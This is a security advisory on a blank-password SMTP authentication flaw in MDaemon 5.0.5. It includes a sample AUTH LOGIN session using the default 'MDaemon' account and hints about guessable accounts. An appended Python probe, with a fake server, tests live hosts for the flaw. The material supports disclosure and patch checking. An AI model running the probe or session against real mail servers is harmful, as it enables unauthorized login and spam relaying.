Hello,

There is a security problem in MDaemon 5.0.5 (other versions may be affected as well) regarding SMTP authentication: a blank password authenticates any valid user.

For the primary domain:
  User: VALIDUSER or VALIDUSER@primarydomain.com
  Password: (blank)

For secondary domains:
  User: VALIDUSER@secondarydomain.com
  Password: (blank)

Using this vulnerability, spammers could abuse the server even if relay control is properly configured. To abuse the server there is no need to obtain userlist.dat and decode the well-known weak encryption of MDaemon 5.0.6 and before (the base64-encoded password with a one-byte offset applied to each character). If a valid user name is required, you could always use the built-in account "MDaemon" with its default password (see references) or a blank password. You could also try well-known accounts (administrator, webmaster, info, spam, admin, etc.).

Sample session (client lines are shown without a prefix; the decoded meaning of each base64 token is given in parentheses):

220 xxx.com ESMTP MDaemon 5.0.5; Sat, 02 Aug 2003 00:51:06 +0200
EHLO localhost
250-xxx.com Hello localhost, pleased to meet you
250-ETRN
250-AUTH LOGIN CRAM-MD5
250-8BITMIME
250 SIZE 0
AUTH LOGIN
334 VXNlcm5hbWU6                  (334 Username:)
TURhZW1vbg==                      (MDaemon)
334 UGFzc3dvcmQ6                  (334 Password:)
                                  (blank password: an empty line)
235 Authentication successful

Buckaroo Banzai

P.S.: The bug has been submitted to ALT-N.

References: related security issues regarding MDaemon 5
-------------------------------------------------------
http://www.securityfocus.com/bid/4689
http://www.securityfocus.com/bid/4686
http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0057.html
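The AUTH LOGIN exchange from the sample session, turned into a check that reports whether a server accepts an empty password for a given user name. This is an added example; it is not code from the advisory or from ALT-N. The protocol steps (AUTH LOGIN, base64 user name, base64 password, 235 on success) are the ones shown in the session above; FakeMDaemon, the client name probe.example, and the user list are constructed for illustration so the probe can be exercised offline, and FakeMDaemon only mimics the behaviour the advisory describes, not the real product.

```python
"""Probe for the blank-password SMTP AUTH LOGIN flaw described in the advisory.

Added example, not code from the advisory or from ALT-N. FakeMDaemon is a
constructed stand-in for the described server behaviour (vulnerable and fixed),
so the probe logic can be run and tested without a live server.
"""
from __future__ import annotations

import base64
import socket
from typing import Callable

# A transport sends one command line and returns the server's final reply line.
Transport = Callable[[str], str]


def b64(text: str) -> str:
    """Encode a SASL LOGIN token; the empty password encodes to an empty line."""
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


def parse_reply(line: str) -> tuple[int, str]:
    """Split an SMTP reply such as '334 VXNlcm5hbWU6' into (334, 'VXNlcm5hbWU6')."""
    code, _, rest = line.strip().partition(" ")
    return int(code), rest


def decode_challenge(line: str) -> str:
    """Decode the base64 prompt of a 334 reply ('334 VXNlcm5hbWU6' -> 'Username:')."""
    code, payload = parse_reply(line)
    if code != 334:
        raise ValueError(f"expected a 334 challenge, got {line!r}")
    return base64.b64decode(payload).decode("ascii", "replace")


def auth_login(send: Transport, username: str, password: str) -> tuple[int, str]:
    """Drive one AUTH LOGIN exchange over `send` and return the final (code, text)."""
    reply = send("AUTH LOGIN")
    if parse_reply(reply)[0] != 334:
        return parse_reply(reply)              # mechanism refused; nothing more to try
    decode_challenge(reply)                    # must be a base64 'Username:' prompt
    reply = send(b64(username))
    if parse_reply(reply)[0] != 334:
        return parse_reply(reply)              # user name rejected early
    return parse_reply(send(b64(password)))    # 235 = accepted, 535 = rejected


def blank_password_accepted(send: Transport, username: str) -> bool:
    """True when the server answers 235 to an empty password for `username`."""
    return auth_login(send, username, "")[0] == 235


def smtp_transport(host: str, port: int = 25, timeout: float = 10.0) -> Transport:
    """Transport over a real TCP connection; the 220 banner is consumed here."""
    sock = socket.create_connection((host, port), timeout=timeout)
    f = sock.makefile("rw", encoding="ascii", errors="replace", newline="")

    def read_reply() -> str:
        while True:                            # skip '250-...' continuation lines
            line = f.readline()
            if not line:
                raise ConnectionError("server closed the connection")
            if len(line) < 4 or line[3] != "-":
                return line.rstrip("\r\n")

    read_reply()

    def send(line: str) -> str:
        f.write(line + "\r\n")
        f.flush()
        return read_reply()

    return send


def probe_host(host: str, username: str, port: int = 25) -> bool:
    """Connect, EHLO (assumed client name), and test an empty password for `username`."""
    send = smtp_transport(host, port)
    send("EHLO probe.example")
    try:
        return blank_password_accepted(send, username)
    finally:
        send("QUIT")


class FakeMDaemon:
    """Constructed stand-in for the described behaviour, usable as a Transport.

    accept_blank=True: any valid local user authenticates with an empty
    password, as reported for 5.0.5. accept_blank=False: the password must
    match, which is what a fix should enforce.
    """

    def __init__(self, users: dict[str, str], primary_domain: str, accept_blank: bool):
        self.users = users                     # user name -> real password
        self.primary_domain = primary_domain
        self.accept_blank = accept_blank
        self.state = "idle"
        self.user = ""

    def _local_user(self, name: str) -> str:
        # user@primarydomain is the same mailbox as the bare user name;
        # secondary-domain users are stored with their full address.
        if name.lower().endswith("@" + self.primary_domain.lower()):
            return name.rsplit("@", 1)[0]
        return name

    def __call__(self, line: str) -> str:
        if self.state == "idle":
            if line.upper().startswith("EHLO"):
                return "250 AUTH LOGIN CRAM-MD5"
            if line.upper() == "AUTH LOGIN":
                self.state = "user"
                return "334 " + b64("Username:")
            return "500 Unrecognized command"
        if self.state == "user":
            self.user = self._local_user(base64.b64decode(line).decode("utf-8", "replace"))
            self.state = "pass"
            return "334 " + b64("Password:")
        password = base64.b64decode(line).decode("utf-8", "replace")
        self.state = "idle"
        expected = self.users.get(self.user)
        if expected is not None and (password == expected or (self.accept_blank and password == "")):
            return "235 Authentication successful"
        return "535 Authentication failed"
```

Against a live host, probe_host("mail.example.test", "MDaemon") performs exactly the session above and returns True only on a 235; a 535 or a refused AUTH LOGIN both return False. The fake server exists so the same logic can be run against the vulnerable and the fixed behaviour side by side, which is the check you would keep around to confirm that a patch actually closed the hole.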